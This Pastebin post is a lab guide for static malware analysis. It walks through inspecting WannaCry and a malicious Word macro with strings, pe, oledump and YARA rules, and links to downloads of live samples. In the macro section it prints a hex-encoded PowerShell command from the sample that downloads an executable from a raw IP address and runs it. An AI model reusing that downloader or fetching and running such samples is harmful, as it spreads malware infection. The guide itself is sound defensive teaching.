Advertisement
joemccray

Static Analysis v2

Sep 30th, 2018
605
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ############################
  2. # Download the Analysis VM #
  3. ############################
  4. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
  5. user: infosecaddicts
  6. pass: infosecaddicts
  7.  
  8.  
  9.  
  10. - Log in to your Ubuntu system with the username 'infosecaddicts' and the password 'infosecaddicts'.
  11.  
  12.  
  13. ###################################
  14. # Setting up your virtual machine #
  15. ###################################
  16.  
  17. Here is where we will setup all of the required dependencies for the tools we plan to install
  18. ---------------------------Type This-----------------------------------
  19. sudo apt update
  20. sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server python-mysqldb python-mysqldb
  21.  
  22.  
  23. sudo pip install -U olefile
  24.  
  25.  
  26. git clone https://github.com/Te-k/pe.git
  27. cd pe
  28. sudo python3 setup.py install
  29. pip3 install .
  30. cd ..
  31. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  32. infected
  33. -----------------------------------------------------------------------
  34.  
  35.  
  36.  
  37.  
  38. ################
  39. # The Scenario #
  40. ################
  41. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  42.  
  43.  
  44. The fastest thing you can do is perform static analysis.
  45.  
  46.  
  47.  
  48. ###################
  49. # Static Analysis #
  50. ###################
  51.  
  52. - After logging please open a terminal window and type the following commands:
  53.  
  54.  
  55. ---------------------------Type This-----------------------------------
  56. cd ~
  57.  
  58. mkdir static_analysis
  59.  
  60. cd static_analysis
  61.  
  62. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  63.  
  64. unzip wannacry.zip
  65. infected
  66.  
  67. file wannacry.exe
  68.  
  69. mv wannacry.exe malware.pdf
  70.  
  71. file malware.pdf
  72.  
  73. mv malware.pdf wannacry.exe
  74.  
  75. hexdump -n 2 -C wannacry.exe
  76.  
  77. ----------------------------------------------------------------------
  78.  
  79.  
  80. ***What is '4d 5a' or 'MZ'***
  81. Reference:
  82. http://www.garykessler.net/library/file_sigs.html
  83.  
  84.  
  85.  
  86.  
  87. ---------------------------Type This-----------------------------------
  88. objdump -x wannacry.exe
  89.  
  90. strings wannacry.exe
  91.  
  92. strings wannacry.exe | grep -i dll
  93.  
  94. strings wannacry.exe | grep -i library
  95.  
  96. strings wannacry.exe | grep -i reg
  97.  
  98. strings wannacry.exe | grep -i key
  99.  
  100. strings wannacry.exe | grep -i rsa
  101.  
  102. strings wannacry.exe | grep -i open
  103.  
  104. strings wannacry.exe | grep -i get
  105.  
  106. strings wannacry.exe | grep -i mutex
  107.  
  108. strings wannacry.exe | grep -i irc
  109.  
  110. strings wannacry.exe | grep -i join
  111.  
  112. strings wannacry.exe | grep -i admin
  113.  
  114. strings wannacry.exe | grep -i list
  115. ----------------------------------------------------------------------
  116.  
  117.  
  118.  
  119.  
  120.  
  121. ---------------------------Type This-----------------------------------
  122. pe info wannacry.exe
  123. pe check wannacry.exe
  124. pe dump --section text wannacry.exe
  125. pe dump --section data wannacry.exe
  126. pe dump --section rsrc wannacry.exe
  127. pe dump --section reloc wannacry.exe
  128. strings rdata | less
  129. strings rsrc | less
  130. strings text | less
  131. ----------------------------------------------------------------------
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  141.  
  142. Quick Google search for "wannacry ransomeware analysis"
  143.  
  144.  
  145. Reference
  146. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  147.  
  148. - Yara Rule -
  149.  
  150.  
  151. Strings:
  152. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  153. $s2 = “Wanna Decryptor” wide ascii nocase
  154. $s3 = “.wcry” wide ascii nocase
  155. $s4 = “WANNACRY” wide ascii nocase
  156. $s5 = “WANACRY!” wide ascii nocase
  157. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165.  
  166. Ok, let's look for the individual strings
  167.  
  168.  
  169. ---------------------------Type This-----------------------------------
  170. strings wannacry.exe | grep -i ooops
  171.  
  172. strings wannacry.exe | grep -i wanna
  173.  
  174. strings wannacry.exe | grep -i wcry
  175.  
  176. strings wannacry.exe | grep -i wannacry
  177.  
  178. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  179. ----------------------------------------------------------------------
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194.  
  195.  
  196. ####################################
  197. # Tired of GREP - let's try Python #
  198. ####################################
  199. Decided to make my own script for this kind of stuff in the future. I
  200.  
  201. Reference1:
  202. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  203.  
  204. This is a really good script for the basics of static analysis
  205.  
  206. Reference:
  207. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  208.  
  209.  
  210. This is really good for showing some good signatures to add to the Python script
  211.  
  212.  
  213. Here is my own script using the signatures (started this yesterday, but still needs work):
  214. https://pastebin.com/guxzCBmP
  215.  
  216.  
  217.  
  218. ---------------------------Type This-----------------------------------
  219. wget https://pastebin.com/raw/guxzCBmP
  220.  
  221.  
  222. mv guxzCBmP am.py
  223.  
  224.  
  225. vi am.py
  226.  
  227. python2.7 am.py wannacry.exe
  228. ----------------------------------------------------------------------
  229.  
  230.  
  231.  
  232. ##############
  233. # Yara Ninja #
  234. ##############
  235.  
  236. Reference:
  237. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  238.  
  239. ----------------------------------------------------------------------------
  240. rule wannacry_1 : ransom
  241. {
  242. meta:
  243. author = "Joshua Cannell"
  244. description = "WannaCry Ransomware strings"
  245. weight = 100
  246. date = "2017-05-12"
  247.  
  248. strings:
  249. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  250. $s2 = "Wanna Decryptor" wide ascii nocase
  251. $s3 = ".wcry" wide ascii nocase
  252. $s4 = "WANNACRY" wide ascii nocase
  253. $s5 = "WANACRY!" wide ascii nocase
  254. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  255.  
  256. condition:
  257. any of them
  258. }
  259.  
  260. ----------------------------------------------------------------------------
  261. rule wannacry_2{
  262. meta:
  263. author = "Harold Ogden"
  264. description = "WannaCry Ransomware Strings"
  265. date = "2017-05-12"
  266. weight = 100
  267.  
  268. strings:
  269. $string1 = "msg/m_bulgarian.wnry"
  270. $string2 = "msg/m_chinese (simplified).wnry"
  271. $string3 = "msg/m_chinese (traditional).wnry"
  272. $string4 = "msg/m_croatian.wnry"
  273. $string5 = "msg/m_czech.wnry"
  274. $string6 = "msg/m_danish.wnry"
  275. $string7 = "msg/m_dutch.wnry"
  276. $string8 = "msg/m_english.wnry"
  277. $string9 = "msg/m_filipino.wnry"
  278. $string10 = "msg/m_finnish.wnry"
  279. $string11 = "msg/m_french.wnry"
  280. $string12 = "msg/m_german.wnry"
  281. $string13 = "msg/m_greek.wnry"
  282. $string14 = "msg/m_indonesian.wnry"
  283. $string15 = "msg/m_italian.wnry"
  284. $string16 = "msg/m_japanese.wnry"
  285. $string17 = "msg/m_korean.wnry"
  286. $string18 = "msg/m_latvian.wnry"
  287. $string19 = "msg/m_norwegian.wnry"
  288. $string20 = "msg/m_polish.wnry"
  289. $string21 = "msg/m_portuguese.wnry"
  290. $string22 = "msg/m_romanian.wnry"
  291. $string23 = "msg/m_russian.wnry"
  292. $string24 = "msg/m_slovak.wnry"
  293. $string25 = "msg/m_spanish.wnry"
  294. $string26 = "msg/m_swedish.wnry"
  295. $string27 = "msg/m_turkish.wnry"
  296. $string28 = "msg/m_vietnamese.wnry"
  297.  
  298.  
  299. condition:
  300. any of ($string*)
  301. }
  302. ----------------------------------------------------------------------------
  303.  
  304.  
  305.  
  306.  
  307.  
  308.  
  309.  
  310. #####################################################
  311. # Analyzing Macro Embedded Malware #
  312. #####################################################
  313. ---------------------------Type This-----------------------------------
  314. mkdir ~/oledump
  315.  
  316. cd ~/oledump
  317.  
  318. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  319.  
  320. unzip oledump_V0_0_22.zip
  321.  
  322. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  323.  
  324. unzip 064016.zip
  325. infected
  326.  
  327. python oledump.py 064016.doc
  328.  
  329. python oledump.py 064016.doc -s A4 -v
  330. -----------------------------------------------------------------------
  331.  
  332.  
  333.  
  334. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  335. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  336.  
  337. ---------------------------Type This-----------------------------------
  338. python oledump.py 064016.doc -s A5 -v
  339. -----------------------------------------------------------------------
  340.  
  341. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  342.  
  343. ---------------------------Type This-----------------------------------
  344. python oledump.py 064016.doc -s A3 -v
  345.  
  346. - Look for "GVhkjbjv" and you should see:
  347.  
  348. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  349.  
  350. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  351. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  352. -----------------------------------------------------------------------
  353.  
  354.  
  355.  
  356. ###############################
  357. # Creating a Malware Database #
  358. ###############################
  359. Creating a malware database (mysql)
  360. -----------------------------------
  361. - Step 1: Logging in
  362. Run the following command in the terminal:
  363. ---------------------------Type This-----------------------------------
  364. mysql -u root -p (set a password of 'malware')
  365.  
  366. - Then create one database by running following command:
  367.  
  368. create database malware;
  369.  
  370. exit;
  371.  
  372. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  373.  
  374. vi mal_to_db.py (fill in database connection information)
  375.  
  376. python mal_to_db.py -i
  377.  
  378. ------- check it to see if the files table was created ------
  379.  
  380. mysql -u root -p
  381. malware
  382.  
  383. show databases;
  384.  
  385. use malware;
  386.  
  387. show tables;
  388.  
  389. describe files;
  390.  
  391. exit;
  392.  
  393. ---------------------------------
  394.  
  395.  
  396. - Now add the malicious file to the DB
  397. ---------------------------Type This-----------------------------------
  398. python mal_to_db.py -f wannacry.exe -u
  399.  
  400.  
  401.  
  402. - Now check to see if it is in the DB
  403. ---------------------------Type This-----------------------------------
  404. mysql -u root -p
  405. malware
  406.  
  407. mysql> use malware;
  408.  
  409. select id,md5,sha1,sha256,time FROM files;
  410.  
  411. mysql> quit;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement